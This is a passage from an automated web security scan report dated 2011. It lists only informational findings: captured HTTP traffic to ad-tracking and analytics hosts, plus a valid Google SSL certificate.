GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$
...[SNIP]...
18.4. http://lfov.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
ETag: W/"1406-1239369371000"
Last-Modified: Fri, 10 Apr 2009 13:16:11 GMT
Content-Length: 1406
Date: Sat, 09 Apr 2011 00:24:25 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

..............h.......(....... ....................................I..=l!.}H).~1{..us...u...o...q.............##...U...Z..CC.........A...K...m...v.....................................................
...[SNIP]...
18.5. http://lfov.net/webrecorder/g/chimera.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=8b608c87-3854-404c-94cf-624bd3d0d3fb; Expires=Sun, 08-Apr-2012 00:18:14 GMT
Content-Length: 51
Date: Sat, 09 Apr 2011 00:18:14 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='8b608c87-3854-404c-94cf-624bd3d0d3fb';

18.6. http://lfov.net/webrecorder/js/listen.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Sun, 03 Apr 2011 02:29:18 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Fri, 15 Apr 2011 20:18:12 GMT
Date: Sat, 09 Apr 2011 00:18:12 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...
18.7. http://pcm2.map.pulsemgr.com/uds/pc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm2.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21273&sig=b2d480a4453ebdf16df158c05281fe0a HTTP/1.1
Host: pcm2.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:48 GMT

GIF89a.............!.......,...........D..;
18.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ulocal.wptz.com
Path:   /service/isUserLoggedIn.kickAction

Request

GET /service/isUserLoggedIn.kickAction?callback=ka_isUserLoggedInKASideCallback&as=62976 HTTP/1.1
Host: ulocal.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8CC9541634BEB8D7F8935EB17EA88E9; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:31:11 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 56
Date: Sat, 09 Apr 2011 12:31:10 GMT
Set-Cookie: BIGipServerapp_server_pool=2075109568.42015.0000; path=/

ka_isUserLoggedInKASideCallback({"isLoggedIn":"false"});
19. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 CST 2009
Valid to:  Sun Dec 18 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 19:00:00 CDT 2004
Valid to:  Mon May 12 18:59:59 CDT 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
Report generated by XSS.CX at Tue Apr 12 10:38:19 CDT 2011.